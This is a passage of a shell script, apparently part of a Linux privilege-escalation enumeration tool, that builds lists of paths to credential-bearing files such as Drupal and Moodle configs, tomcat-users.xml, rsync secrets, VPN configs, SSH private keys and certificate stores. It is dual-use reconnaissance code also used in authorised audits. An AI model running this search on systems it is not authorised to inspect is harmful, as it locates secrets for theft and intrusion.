PSTORAGE_DRUPAL=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E '/default/settings.php' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "settings\.php$" | sort | uniq | head -n 70) PSTORAGE_DRUPAL=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E '/default/settings.php' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "settings\.php$" | sort | uniq | head -n 70)
PSTORAGE_MOODLE=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E 'moodle/config.php' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "config\.php$" | sort | uniq | head -n 70) PSTORAGE_MOODLE=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E 'moodle/config.php' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "config\.php$" | sort | uniq | head -n 70)
PSTORAGE_TOMCAT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) PSTORAGE_TOMCAT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70)
PSTORAGE_MONGO=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) PSTORAGE_MONGO=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70)
PSTORAGE_SUPERVISORD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) PSTORAGE_SUPERVISORD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70)
PSTORAGE_CESI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) PSTORAGE_CESI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "cesi\.conf$" | sort | uniq | head -n 70)
PSTORAGE_RSYNC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) PSTORAGE_RSYNC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70)
PSTORAGE_HOSTAPD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) PSTORAGE_HOSTAPD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70)
PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70)
PSTORAGE_RACOON=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) PSTORAGE_RACOON=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70)
PSTORAGE_VNC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) PSTORAGE_VNC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70)
PSTORAGE_LDAP=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "ldap$" | sort | uniq | head -n 70) PSTORAGE_LDAP=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "ldap$" | sort | uniq | head -n 70)
PSTORAGE_OPENVPN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) PSTORAGE_OPENVPN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70)
PSTORAGE_SSH=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) PSTORAGE_SSH=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70)
PSTORAGE_CERTSB4=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) PSTORAGE_CERTSB4=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70)
PSTORAGE_CERTSBIN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) PSTORAGE_CERTSBIN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70)
PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70)
